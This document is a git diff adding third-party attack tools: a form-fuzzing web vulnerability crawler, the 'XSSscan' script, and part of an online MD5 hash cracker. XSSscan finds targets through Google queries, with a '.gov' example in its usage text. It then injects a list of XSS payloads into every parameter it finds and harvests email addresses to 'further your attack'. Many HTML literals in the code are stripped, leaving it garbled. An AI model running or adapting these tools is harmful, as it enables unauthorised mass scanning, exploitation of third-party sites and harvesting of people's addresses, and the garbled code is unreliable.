"http://www.google.com/" +def urlfix(url): + if url[:7]!="http://": url="http://"+url + slash=url[7:].find("/") + if slash==-1: url+="/" + return url + +# function to get the server name of a url +def servername(url,ig_subd=ignore_subdomain): + url=urlfix(url)[7:] + url=url[:url.find("/")] +# if ig_subd: url=sre.sub("^.*?([^\.]*\.[^\.]*)$","\\1",url) + return url + +def checkserver(server): + global domains + for domain in domains: + if domain[:1]==".": + if server[-len(domain)+1:]==domain[1:]: return True + else: + if server==domain: return True + return False + +# function to fix the headers so they don't contain %25's (%'s) or the xxploit code +def headerfupr(hdr,explt): + hdr=hdr.replace("%25","%") + hdr=hdr.replace(explt,"") + return hdr + +# function to remove urls from the body of a page +def removeurls(body): return sre.sub("http://([^ \"\']+)","",body) + +# function to retreive the full path of a url based on the current page url +def fullpath(url,pageurl): + + if url.lower()[:7]=="http://": return url + + if pageurl.count("?")!=0: pageurl=pageurl[:pageurl.find("?")] + + if url.count("?")>0: + if url[:1]=="?": return pageurl+url + pageurl=pageurl[:pageurl.find("?")] + + #pageurl=pageurl[:pageurl.find("?")] + + pagedomain=pageurl[:pageurl[7:].find("/")+7] + if url[:1]=="/": return pagedomain+url + + pagepath=pageurl[pageurl[7:].find("/")+7:] + pagepath=pagepath[:pagepath.rfind("/")+1] + path=pagepath+url + path=sre.sub("\.\/","\/",path) + path=sre.sub("\/([^\/]+)\/..\/","\/",path) + + return pagedomain+path + +# function to get the value of HTML attribute before a ">" +def getattrval(body,attr): + body=sre.sub("([^\>]*)\>([^\000]*)","\\1",body) + if sre.search(attr+"=(\"|'|)([^\\1\ \>]*)\\1",body)!=None: + delim=sre.sub("[^\>]* "+attr+"=(\"|'|)([^\\1\ \>]*)\\1([^\>]*)","\\1",body) + exp="[^\>]* "+attr+"=(\\"+delim+")([^" + if delim=="": exp+="\ " + else: exp+=delim + exp+="\>]*)\\"+delim+"([^\>]*)" + return sre.sub(exp,"\\2",body) + else: return "" + +# function to retreive a page based on input +def getpage(url,dheaders=1,redir=0,realpage=0,poststring="",exceptions=0): + + # function to recurse and try getpage() again with new values + def recurse(exceptions): + + sock.close() + exceptions+=1 + + if exceptions<=6: return getpage(url,dheaders,redir,realpage,poststring,exceptions) + else: + print "Too many recursions, skipping..." + return + + + global usecookies,urllogfile,debug,ignorefileext + if not checkserver(servername(url)): return + + if url.find("#")!=-1: url=url[:url.find("#")] + + # file extensions that need to be ignored code + fileext=sre.sub(".*(http\://[^/]*/).*","\\1",url) + if url==fileext: fileext="None" + else: fileext=sre.sub("^.*\/[^/]*\.([^\&\#\?\/]*)[^/]*$","\\1",url) + if ignorefileext.count(","+fileext+",")!=0: return + + try: + + sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + sock.connect((servername(url,False),80)) + + workurl=pagename(url) + theurl=url + if redir!=1: theurl=workurl + + qrytype="GET" + if poststring!="": qrytype="POST" + out=(qrytype+" "+theurl+" HTTP/1.1\n" + "Host: "+servername(url,False)+"\n" + "Connection: close\n") + if usecookies: + global cookies + out+="Cookie: "+cookies+"\n" + if poststring!="": + out+="Content-Type: application/x-www-form-urlencoded\n" + out+="Content-Length: "+str(len(poststring)) + out+="\n\n"+poststring+"\n" + out+="\r\n\r\n" + sock.send(out) + + # get response type and log the page + response=sock.recv(12)[-3:] + fp=open("logs/"+urllogfile,"a") + fp.write(url+": "+response+" "+str(realpage)+"\n") + if poststring!="": fp.write(indent+"POST: "+poststring+"\n") + fp.close() + + + # at 404 response, close connection and fail + if response=="404" or response=="500": + sock.close() + return + + # at 30[1237] response types, recurse new page + if sre.search("30[1237]",response): + while 1: + chunk="" + byte=sock.recv(1) + while byte!="\r": + chunk+=byte + byte=sock.recv(1) + sock.recv(1) + if chunk.lower()[:9]=="location:": + location=chunk.lower()[9:].strip() + if location=="http://"+servername(url,False)+url: location="/" + locpage=fullpath(location,url) + sock.close() +# if url[len(url)-2:]=="" and locpage[len(locpage)-4:]=="": break + redir=1 + if locpage!=url: + redir=0 + if pagename(sre.sub("\\\\(\"|\')","\\1",locpage))==pagename(url): + print "QUOTE REDIR" + return + print "OLD:",url + print "NEW:",chunk.lower() + print "REDIR:",locpage + return getpage(locpage,redir=redir,realpage=realpage) + if realpage==1: + sock.close() + return + + elif realpage==1: + sock.close() + return url + + # get headers, ignoring certain HTTP headers + headers="" + type=0 + while 1: + chunk="" + byte=sock.recv(1) + if byte=="\r": + sock.recv(1) + break + while byte!="\r": + chunk+=byte + byte=sock.recv(1) + sock.recv(1) + + if chunk.lower()[:11]!="set-cookie:" and chunk.lower()[:5]!="date:" and chunk.lower()[:15]!="content-length:" and chunk.lower()[:11]!="keep-alive:" and chunk.lower()[:18]!="transfer-encoding:" and chunk.lower()[:11]!="connection:": + headers+=chunk + +# if chunk.lower()[:15]=="content-length:": +# type=1 +# conlen=int(chunk[16:]) + + if chunk.lower()[:26]=="transfer-encoding: chunked": type=2 + + # no special type specified, just get the page + if type==0: + body="" + while 1: + chunk=sock.recv(200) + body+=chunk + if chunk=="": break + + + # set it up if it does have a type +# else: +# byte=sock.recv(1) +# if byte=="\r": sock.recv(1) +# else: +# while 1: +# i=-1 +# while byte!="\r": +# i+=1 +# byte=sock.recv(1) +# nbytes=sock.recv(3) +# if nbytes=="\n\r\n": break + +# # content-length +# if type==1: +# body="" +# for i in range(conlen): +# chunk=sock.recv(1) +# body+=chunk + + # transfer-encoding: chunked + if type==2: + body="" + chunksize="" + while chunksize!=0: + byte="" + chunk="" + while byte!="\r": + chunk+=byte + byte=sock.recv(1) + sock.recv(1) + chunksize=int(chunk,16) + wchunksz=chunksize + while wchunksz>=1: + subchunk=sock.recv(wchunksz) + body+=subchunk + wchunksz-=len(subchunk) + sock.recv(2) + + # clean up and return + sock.close() + if dheaders!=1: headers="" + + return [headers,body,urlfix(url)] + + # catch socket errors, such as "connection reset by peer" - trys again until it gives up and goes on to the next page + except socket.error: + print "Socket Error, Recursing..." + return recurse(exceptions) + +# function to remove everything in the "" tag from a server response +def decapitate(body): + + if body==None: return + + global decapitation + if decapitation==True: body=sre.sub("(.+?)","",body) + + return body + + +# function to generate a random identification string +def randident(thelen=randidentlen,randchars="Bghi3rj9uwEFabTGH1ImnL4xpCstUOvoPYk25qVJK8Z0Q67lWXefMRSDcdyzAN"): +# global randidentlen + rndidnt="" + while len(rndidnt)=4: + body=removeexplt(body,explt) + body=parsebody(body) + body=removeexplt(body,explt) + else: body=parsebody(body) + if randstr!="": body=removeexplt(body,randstr) + + return body + +# function to parse the body for checking agsinst others +def parsebody(body): + + global sessstr,pagetype + + body=body.replace("%2d","-") + body=body.replace("%2D","-") + body=body.replace("%25","%") + body=body.replace("%20"," ") + body=body.replace("+"," ") + body=body.replace("%2b","+") + body=body.replace("%2B","+") + body=body.replace("%22","\"") + body=body.replace("\\\"","\"") + body=body.replace("\\'","'") + body=body.replace("\n","") + body=body.replace("\r","") + body=sre.sub(sessstr,"",body) + + # These might cause problems + body=sre.sub("\]*)\>(.*?)\","",body) + body=sre.sub("\ "+url + + pageinfo=getpage(url) + if listempty(pageinfo): return + + body=pageinfo[1].lower() + + print "AA" + + # select/option, textarea + # check for forms + bodyarr=sre.split("")] + frmbody=bodyarr[i][bodyarr[i].find(">"):][:bodyarr[i].find("")] + + actionurl=getattrval(frmsect,"action") + if actionurl=="" or actionurl==frmsect or actionurl=="\"\"": actionurl=pageinfo[2] + if actionurl.count(";")>0: actionurl=actionurl[actionurl.find(";")+1:] + if actionurl[:11].lower()=="javascript:": continue + actionurl=fullpath(actionurl,pageinfo[2]) + + print "ACTION:",actionurl + + # get the input variables + poststring="" + inputarr=sre.sub("(.*?)\]*)\>(.*?)","\\2|ZZaaXXaaZZ|",frmbody).split("|ZZaaXXaaZZ|") + for j in range(len(inputarr)): + + name=getattrval(inputarr[j],"name") + if name==inputarr[j] or name=="" or name=="\"\"": continue + + value=getattrval(inputarr[j],"value") + if value==inputarr[j] or value=="" or value=="\"\"": value="" + + if poststring!="": poststring+="&" + poststring+=name+"="+value + + # get select/option tags + selectarr=sre.sub("(.*?)\]*)\>(.*?)","\\2|ZZaaXXaaZZ|",frmbody).split("|ZZaaXXaaZZ|") + for j in range(len(selectarr)): + + name=getattrval(selectarr[j],"name") + if name==selectarr[j] or name=="" or name=="\"\"": continue + + value=sre.sub("(.*?)\]*)value=(\"|'|)([^\\3\ ]*)\\3([^\>]*)\>(.*?)","\\2",selectarr[j]) + if value==selectarr[j] or value=="" or value=="\"\"": value="" + + if poststring!="": poststring+="&" + poststring+=name+"="+value + print "sel/opt: "+name+"="+value + + if poststring=="": continue + + if sre.search("method=([\'\"]|)post([\'\"]|)",frmsect[:frmsect.find(">")].lower())==None: + if actionurl.find("?")!=-1: actionurl+="&" + else: actionurl+="?" + actionurl+=poststring + body+='' + print 'GETT ' + continue + + # determine if it needs to be scanned, and if so, scan it + postscan=0 + postvars=poststring.split("&") + if postfields.has_key(actionurl): + for j in range(len(postvars)): + postvars[j]=postvars[j][:postvars[j].find("=")] + if postfields[actionurl].count(postvars[j])==0: + postfields[actionurl].append(postvars[j]) + postscan=1 + else: + for j in range(len(postvars)): postvars[j]=postvars[j][:postvars[j].find("=")] + postfields[actionurl]=postvars + postscan=1 + + if postscan==1: + vulns=checkvars(actionurl,poststring) + if not listempty(vulns): dispvulns(vulns,actionurl) + + print "BB" + + # check for urls in "href" tags + # ? # part of 3? (src|href|location|window.open)= and http:// + urlreg="(\'|\")(?!javascript:)(([^\>]+?)(?!\.("+ignorefileext.replace(",","|")+"))(.{3,8}?)(|\?([^\>]+?)))" + urlarr=sre.sub("(?s)(?i)(.+?)((src|href)=|location([\ ]*)=([\ ]*)|window\.open\()"+urlreg+"\\6","\\7|ZZaaXXaaZZ|",body).split("|ZZaaXXaaZZ|") + del urlarr[len(urlarr)-1] + urlarr.append(sre.sub("(?s)(?i)(.+?)(src|href)="+urlreg+"\\3","\\4|ZZaaXXaaZZ|",body).split("|ZZaaXXaaZZ|")) + del urlarr[len(urlarr)-1] + for i in range(len(urlarr)): + + theurl=fullpath(urlarr[i],pageinfo[2]) + if not checkserver(servername(theurl)): continue + + # determine if it needs scanned and/or treed, and if so, scan and/or tree it + getscan=0 + if theurl.count("?")!=0: + nqurl=theurl[:theurl.find("?")] + query=theurl[theurl.find("?")+1:] + query=sre.sub("\&\;","\&",query) + qryvars=query.split("&") + if urlfields.has_key(nqurl): + for j in range(len(qryvars)): + qryvars[j]=qryvars[j][:qryvars[j].find("=")] + if urlfields[nqurl].count(qryvars[j])==0: + urlfields[nqurl].append(qryvars[j]) + getscan=1 + else: + for j in range(len(qryvars)): qryvars[j]=qryvars[j][:qryvars[j].find("=")] + urlfields[nqurl]=qryvars + getscan=1 + else: + if urlfields.has_key(theurl)==False: urlfields[theurl]=[] + nqurl=theurl + + if getscan==1: + vulns=checkvars(theurl) + if not listempty(vulns): dispvulns(vulns,theurl) + tree=treeglob + if treedurls.has_key(nqurl): + if treedurls[nqurl].count(theurl)==0 and len(treedurls[nqurl])<=scanlimit: + treedurls[nqurl].append(theurl) + else: tree=0 + + else: treedurls[nqurl]=[theurl] + if tree==1 and level\n" + print "\n Example: python XSSscan.py -g inurl:'.gov' 200 -a 'XSS h4ck3d' -write xxs_found.txt -v\n" + print "\t[options]" + print "\t -g/-google : Searches google for hosts" + print "\t -s/-site : Searches just that site, (default port 80)" + print "\t -a/-alert : Change the alert pop-up message" + print "\t -w/-write : Writes potential XSS found to file" + print "\t -v/-verbose : Verbose Mode\n" + +def StripTags(text): + finished = 0 + while not finished: + finished = 1 + start = text.find("<") + if start >= 0: + stop = text[start:].find(">") + if stop >= 0: + text = text[:start] + text[start+stop+1:] + finished = 0 + return text + +def timer(): + now = time.localtime(time.time()) + return time.asctime(now) + +def geturls(query): + + counter = 10 + urls = [] + + while counter < int(sys.argv[3]): + url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N' + opener = urllib2.build_opener(url) + opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')] + data = opener.open(url).read() + hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data)) + #Lets add sites found to a list if not already or a google site. + #We don't want to upset the people that got our list for us. + for x in hosts: + if x.find('www') != -1: + x = x[x.find('www'):] + if x not in urls and re.search("google", x) == None: + urls.append(x) + counter += 10 + return urls + +def getemails(site): + + try: + if site.split("/",1)[0] not in done: + print "\t[+] Collecting Emails:",site.split("/",1)[0] + webpage = urllib2.urlopen(proto+"://"+site.split("/",1)[0], port).read() + emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage) + done.append(site.split("/",1)[0]) + if emails: + return emails + except(KeyboardInterrupt): + print "\n[-] Cancelled -",timer(),"\n" + sys.exit(1) + except(IndexError): + pass + +def getvar(site): + + names = [] + actions = [] + print "\n","-"*45 + print "[+] Searching:",site + try: + webpage = urllib2.urlopen(proto+"://"+site, port).read() + emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage) + var = re.findall("\?[\w\.\-/]*\=",webpage) + if len(var) >=1: + var = list(sets.Set(var)) + found_action = re.findall("action=\"[\w\.\-/]*\"", webpage.lower()) + found_action = list(sets.Set(found_action)) + if len(found_action) >= 1: + for a in found_action: + a = a.split('"',2)[1] + try: + if a[0] != "/": + a = "/"+a + except(IndexError): + pass + actions.append(a) + found_names = re.findall("name=\"[\w\.\-/]*\"", webpage.lower()) + found_names = list(sets.Set(found_names)) + for n in found_names: + names.append(n.split('"',2)[1]) + print "[+] Variables:",len(var),"| Actions:",len(actions),"| Fields:",len(names) + print "[+] Avg Requests:",(len(var)+len(names)+(len(actions)*len(names))+(len(actions)*len(names)))*len(xss_payloads) + if len(var) >= 1: + for v in var: + if site.count("/") >= 2: + for x in xrange(site.count("/")): + for xss in xss_payloads: + tester(site.rsplit('/',x+1)[0]+"/"+v+xss) + for xss in xss_payloads: + tester(site+"/"+v+xss) + + if len(names) >= 1: + for n in names: + if site.count("/") >= 2: + for x in xrange(site.count("/")): + for xss in xss_payloads: + tester(site.rsplit('/',x+1)[0]+"/"+"?"+n+"="+xss) + for xss in xss_payloads: + tester(site+"/"+"?"+n+"="+xss) + + if len(actions) != 0 and len(names) >= 1: + for a in actions: + for n in names: + if site.count("/") >= 2: + for x in xrange(site.count("/")): + for xss in xss_payloads: + tester(site.rsplit('/',x+1)[0]+a+"?"+n+"="+xss) + #tester(site.split("/")[0]+a+"?"+n+"="+xss) + + if len(actions) != 0 and len(var) >= 1: + for a in actions: + for v in var: + if site.count("/") >= 2: + for x in xrange(site.count("/")): + for xss in xss_payloads: + tester(site.rsplit('/',x+1)[0]+a+v+xss) + else: + for xss in xss_payloads: + tester(site.split("/")[0]+a+v+xss) + if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google": + urls.remove(site) + + except(socket.timeout, IOError, ValueError, socket.error, socket.gaierror): + if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google": + urls.remove(site) + pass + except(KeyboardInterrupt): + print "\n[-] Cancelled -",timer(),"\n" + sys.exit(1) + +def tester(target): + + if verbose ==1: + if message != "": + print "Target:",target.replace(alert ,message) + else: + print "Target:",target + + try: + source = urllib2.urlopen(proto+"://"+target, port).read() + h = httplib.HTTPConnection(target.split('/')[0], int(port)) + try: + h.request("GET", "/"+target.split('/',1)[1]) + except(IndexError): + h.request("GET", "/") + r1 = h.getresponse() + if verbose ==1: + print "\t[+] Response:",r1.status, r1.reason + if re.search(alert.replace("%2D","-"), source) != None and r1.status not in range(303, 418): + if target not in found_xss: + if message != "": + print "\n[!] XSS:", target.replace(alert ,message) + else: + print "\n[!] XSS:", target + print "\t[+] Response:",r1.status, r1.reason + emails = getemails(target) + if emails: + print "\t[+] Email:",len(emails),"addresses\n" + found_xss.setdefault(target, list(sets.Set(emails))) + else: + found_xss[target] = "None" + except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine, httplib.IncompleteRead, httplib.InvalidURL): + pass + except(KeyboardInterrupt): + print "\n[-] Cancelled -",timer(),"\n" + sys.exit(1) + except(): + pass + +if len(sys.argv) <= 2: + usage() + sys.exit(1) + +for arg in sys.argv[1:]: + if arg.lower() == "-v" or arg.lower() == "-verbose": + verbose = 1 + if arg.lower() == "-w" or arg.lower() == "-write": + txt = sys.argv[int(sys.argv[1:].index(arg))+2] + if arg.lower() == "-a" or arg.lower() == "-alert": + message = re.sub("\s","%2D",sys.argv[int(sys.argv[1:].index(arg))+2]) + +title() +socket.setdefaulttimeout(10) +found_xss = {} +done = [] +count = 0 +proto = "http" +alert = "D3HYDR8%2D0wNz%2DY0U" +print "\n[+] XSS_scan Loaded" +try: + if verbose ==1: + print "[+] Verbose Mode On" +except(NameError): + verbose = 0 + print "[-] Verbose Mode Off" +try: + if message: + print "[+] Alert:",message +except(NameError): + print "[+] Alert:",alert + message = "" + pass + +xss_payloads = ["%22%3E%3Cscript%3Ealert%28%27"+alert+"%27%29%3C%2Fscript%3E", + "%22%3E", + "%22%3E", + "'';!--\"<%27"+alert+"%27>=&{()}", + "';alert(0)//\';alert(1)//%22;alert(2)//\%22;alert(3)//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(%27"+alert+"%27)%3C/SCRIPT%3E=&{}%22);}alert(6);function", + ""] +try: + if txt: + print "[+] File:",txt +except(NameError): + txt = None + pass +print "[+] XSS Payloads:",len(xss_payloads) +if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google": + try: + if sys.argv[3].isdigit() == False: + print "\n[-] Argument [",sys.argv[3],"] must be a number.\n" + sys.exit(1) + else: + if int(sys.argv[3]) <= 10: + print "\n[-] Argument [",sys.argv[3],"] must be greater than 10.\n" + sys.exit(1) + except(IndexError): + print "\n[-] Need number of hosts to collect.\n" + sys.exit(1) + query = re.sub("\s","+",sys.argv[2]) + port = "80" + print "[+] Query:",query + print "[+] Querying Google..." + urls = geturls(query) + print "[+] Collected:",len(urls),"hosts" + print "[+] Started:",timer() + print "\n[-] Cancel: Press Ctrl-C" + time.sleep(3) + while len(urls) > 0: + print "-"*45 + print "\n[-] Length:",len(urls),"remain" + getvar(random.choice(urls)) +if sys.argv[1].lower() == "-s" or sys.argv[1].lower() == "-site": + site = sys.argv[2] + try: + if sys.argv[3].isdigit() == False: + port = "80" + else: + port = sys.argv[3] + except(IndexError): + port = "80" + print "[+] Site:",site + print "[+] Port:",port + if site[:7] == "http://": + site = site.replace("http://","") + if site[:8] == "https://": + proto = "https" + if port == "80": + print "[!] Using port 80 with https? (443)" + site = site.replace("https://","") + print "[+] Started:",timer() + print "\n[-] Cancel: Press Ctrl-C" + time.sleep(4) + getvar(site) + +print "-"*65 +print "\n\n[+] Potential XSS found:",len(found_xss),"\n" +time.sleep(3) +if txt != None and len(found_xss) >=1: + xss_file = open(txt, "a") + xss_file.writelines("\n\td3hydr8[at]gmail[dot]com XSS Scanner v1.3\n") + xss_file.writelines("\t------------------------------------------\n\n") + print "[+] Writing Data:",txt +else: + print "[-] No data written to disk" +for k in found_xss.keys(): + count+=1 + if txt != None: + if message != "": + xss_file.writelines("["+str(count)+"] "+k.replace(alert ,message)+"\n") + else: + xss_file.writelines("["+str(count)+"] "+k+"\n") + if message != "": + print "\n["+str(count)+"]",k.replace(alert ,message) + else: + print "\n["+str(count)+"]",k + addrs = found_xss[k] + if addrs != "None": + print "\t[+] Email addresses:" + for addr in addrs: + if txt != None: + xss_file.writelines("\tEmail: "+addr+"\n") + print "\t -",addr +print "\n[-] Done -",timer(),"\n" + diff --git a/3rdparty/XSSscan_v1.1.py b/3rdparty/XSSscan_v1.1.py new file mode 100644 index 0000000..9028e9f --- /dev/null +++ b/3rdparty/XSSscan_v1.1.py @@ -0,0 +1,258 @@ +#!/usr/bin/python +#XSS Scanner that can find hosts using a google query or search one site. +#If XSS is found it attempts to collect email addresses to further your attack +#or warn the target of the flaw. When the scan is complete +#it will print out the XSS's found and or write to file, it will find false positives +#so manually check before getting to excited. It also has verbose mode and +#you can change the alert pop-up message, check options!! +#Warning: Don't change the alert pop-up to something that will be different in the source. (symbol encoding) +#d3hydr8[at]gmail[dot]com + +import sys, urllib2, re, sets, random, httplib, time, socket + +def title(): + print "\n\t d3hydr8[at]gmail[dot]com XSS Scanner v1.1" + print "\t-----------------------------------------------" + +def usage(): + title() + print "\n Usage: python XSSscan.py
', html) + + if match: + return match.group().split('b>')[1][:-2] + + return None + + +class THEKAINE: + + name = "thekaine" + url = "http://md5.thekaine.de" + supported_algorithm = [MD5] + + def isSupported (self, alg): + """Return True if HASHCRACK can crack this type of algorithm and + False if it cannot.""" + + if alg in self.supported_algorithm: + return True + else: + return False + + + def crack (self, hashvalue, alg): + """Try to crack the hash. + @param hashvalue Hash to crack. + @param alg Algorithm to crack.""" + + # Check if the cracker can crack this kind of algorithm + if not self.isSupported (alg): + return None + + # Build the URL + url = "http://md5.thekaine.de/?hash=%s" % (hashvalue) + + # Make the request + response = do_HTTP_request ( url ) + + # Analyze the response + html = None + if response: + html = response.read() + else: + return None + + match = search (r'

[^<]*', html) + + if match: + + match2 = search (r'not found', match.group() ) + + if match2: + return None + else: + return match.group().split('b>')[1][:-2] + + + +class TMTO: + + name = "tmto" + url = "http://www.tmto.org" + supported_algorithm = [MD5] + + def isSupported (self, alg): + """Return True if HASHCRACK can crack this type of algorithm and + False if it cannot.""" + + if alg in self.supported_algorithm: + return True + else: + return False + + + def crack (self, hashvalue, alg): + """Try to crack the hash. + @param hashvalue Hash to crack. + @param alg Algorithm to crack.""" + + # Check if the cracker can crack this kind of algorithm + if not self.isSupported (alg): + return None + + # Build the URL + url = "http://www.tmto.org/api/latest/?hash=%s&auth=true" % (hashvalue) + + # Make the request + response = do_HTTP_request ( url ) + + # Analyze the response + html = None + if response: + html = response.read() + else: + return None + + match = search (r'text="[^"]+"', html) + + if match: + return decodestring(match.group().split('"')[1]) + else: + return None + + +class MD5_DB: + + name = "md5-db" + url = "http://md5-db.de" + supported_algorithm = [MD5] + + def isSupported (self, alg): + """Return True if HASHCRACK can crack this type of algorithm and + False if it cannot.""" + + if alg in self.supported_algorithm: + return True + else: + return False + + + def crack (self, hashvalue, alg): + """Try to crack the hash. + @param hashvalue Hash to crack. + @param alg Algorithm to crack.""" + + # Check if the cracker can crack this kind of algorithm + if not self.isSupported (alg): + return None + + # Build the URL + url = "http://md5-db.de/%s.html" % (hashvalue) + + # Make the request + response = do_HTTP_request ( url ) + + # Analyze the response + if not response: + return None + + html = None + if response: + html = response.read() + else: + return None + + match = search (r'Es wurden 1 m.gliche Begriffe gefunden, die den Hash \w* verwenden: